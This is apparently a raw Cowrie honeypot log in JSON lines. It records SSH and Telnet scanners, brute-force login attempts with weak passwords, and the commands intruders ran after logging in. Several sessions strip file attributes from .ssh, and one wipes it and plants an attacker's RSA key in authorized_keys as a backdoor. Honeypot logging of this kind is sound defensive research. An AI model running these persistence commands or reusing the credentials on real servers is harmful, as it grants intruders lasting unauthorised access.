{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57592,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca97659fe5d8","protocol":"ssh","message":"New connection: 212.227.235.229:57592 (1.2.3.4:22) [session: ca97659fe5d8]","sensor":"my-vps","timestamp":"2025-09-08T13:24:27.303038Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:24:27.308350Z","src_ip":"212.227.235.229","session":"ca97659fe5d8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:24:27.616779Z","src_ip":"212.227.235.229","session":"ca97659fe5d8"}
{"eventid":"cowrie.login.failed","username":"audit","password":"1","message":"login attempt [audit/1] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:28.860606Z","src_ip":"212.227.235.229","session":"ca97659fe5d8"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:30.175362Z","src_ip":"212.227.235.229","session":"ca97659fe5d8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49613,"dst_ip":"1.2.3.4","dst_port":23,"session":"72bf5d16a4ef","protocol":"telnet","message":"New connection: 212.227.235.229:49613 (1.2.3.4:23) [session: 72bf5d16a4ef]","sensor":"my-vps","timestamp":"2025-09-08T13:24:34.084619Z"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":58748,"dst_ip":"1.2.3.4","dst_port":22,"session":"21247ef9a364","protocol":"ssh","message":"New connection: 134.199.174.250:58748 (1.2.3.4:22) [session: 21247ef9a364]","sensor":"my-vps","timestamp":"2025-09-08T13:24:40.375182Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:24:40.376223Z","src_ip":"134.199.174.250","session":"21247ef9a364"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:24:40.666853Z","src_ip":"134.199.174.250","session":"21247ef9a364"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e4r","message":"login attempt [postgres/1q2w3e4r] failed","sensor":"my-vps","timestamp":"2025-09-08T13:24:41.606097Z","src_ip":"134.199.174.250","session":"21247ef9a364"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","size":483,"shasum":"4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:42.758497Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.session.closed","duration":180.06220984458923,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:42.762507Z","src_ip":"176.65.149.186","session":"95d0c6239d8d"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:24:43.024153Z","src_ip":"134.199.174.250","session":"21247ef9a364"}
{"eventid":"cowrie.session.closed","duration":31.468446731567383,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:05.553000Z","src_ip":"212.227.235.229","session":"72bf5d16a4ef"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":33472,"dst_ip":"1.2.3.4","dst_port":22,"session":"037bb97c960b","protocol":"ssh","message":"New connection: 139.59.14.27:33472 (1.2.3.4:22) [session: 037bb97c960b]","sensor":"my-vps","timestamp":"2025-09-08T13:25:07.593803Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:07.594519Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:07.927111Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.login.success","username":"root","password":"123456a?","message":"login attempt [root/123456a?] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:25:09.385440Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:10.124177Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:10.124837Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:10.125592Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:10.455851Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:11.265117Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-08T13:25:11.265788Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T13:25:11.629826Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.4","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:11.630711Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57210,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e0e192ff7b2","protocol":"ssh","message":"New connection: 139.59.14.27:57210 (1.2.3.4:22) [session: 4e0e192ff7b2]","sensor":"my-vps","timestamp":"2025-09-08T13:25:11.929271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:11.930259Z","src_ip":"139.59.14.27","session":"4e0e192ff7b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:12.250807Z","src_ip":"139.59.14.27","session":"4e0e192ff7b2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.174.250","src_port":55752,"dst_ip":"1.2.3.4","dst_port":22,"session":"303673d084a3","protocol":"ssh","message":"New connection: 134.199.174.250:55752 (1.2.3.4:22) [session: 303673d084a3]","sensor":"my-vps","timestamp":"2025-09-08T13:25:12.917174Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-09-08T13:25:12.918049Z","src_ip":"134.199.174.250","session":"303673d084a3"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-09-08T13:25:13.171722Z","src_ip":"134.199.174.250","session":"303673d084a3"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:13.505871Z","src_ip":"139.59.14.27","session":"4e0e192ff7b2"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"pass123","message":"login attempt [postgres/pass123] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:14.029755Z","src_ip":"134.199.174.250","session":"303673d084a3"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:14.820879Z","src_ip":"139.59.14.27","session":"4e0e192ff7b2"}
{"eventid":"cowrie.session.connect","src_ip":"139.59.14.27","src_port":57218,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f57ce3b462","protocol":"ssh","message":"New connection: 139.59.14.27:57218 (1.2.3.4:22) [session: 78f57ce3b462]","sensor":"my-vps","timestamp":"2025-09-08T13:25:15.142740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:15.143402Z","src_ip":"139.59.14.27","session":"78f57ce3b462"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:15.289968Z","src_ip":"134.199.174.250","session":"303673d084a3"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:15.460012Z","src_ip":"139.59.14.27","session":"78f57ce3b462"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:25:16.835703Z","src_ip":"139.59.14.27","session":"78f57ce3b462"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:17.166528Z","src_ip":"139.59.14.27","session":"78f57ce3b462"}
{"eventid":"cowrie.session.closed","duration":"9.6","message":"Connection lost after 9.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:17.174816Z","src_ip":"139.59.14.27","session":"037bb97c960b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52724,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6ac09660e2e","protocol":"ssh","message":"New connection: 212.227.235.229:52724 (1.2.3.4:22) [session: c6ac09660e2e]","sensor":"my-vps","timestamp":"2025-09-08T13:25:21.477695Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:21.478621Z","src_ip":"212.227.235.229","session":"c6ac09660e2e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:21.579451Z","src_ip":"212.227.235.229","session":"c6ac09660e2e"}
{"eventid":"cowrie.login.failed","username":"deployer","password":"111","message":"login attempt [deployer/111] failed","sensor":"my-vps","timestamp":"2025-09-08T13:25:22.048394Z","src_ip":"212.227.235.229","session":"c6ac09660e2e"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-08T13:25:23.160996Z","src_ip":"212.227.235.229","session":"c6ac09660e2e"}
{"eventid":"cowrie.session.connect","src_ip":"49.247.35.31","src_port":31723,"dst_ip":"1.2.3.4","dst_port":22,"session":"c6b72e09a0c6","protocol":"ssh","message":"New connection: 49.247.35.31:31723 (1.2.3.4:22) [session: c6b72e09a0c6]","sensor":"my-vps","timestamp":"2025-09-08T13:25:35.258445Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T13:25:35.275387Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T13:25:35.558260Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.login.success","username":"root","password":"Hetzner$1234","message":"login attempt [root/Hetzner$1234] succeeded","sensor":"my-vps","timestamp":"2025-09-08T13:25:36.720311Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-08T13:25:37.333667Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:37.334322Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-08T13:25:37.335371Z","src_ip":"49.247.35.31","session":"c6b72e09a0c6"}
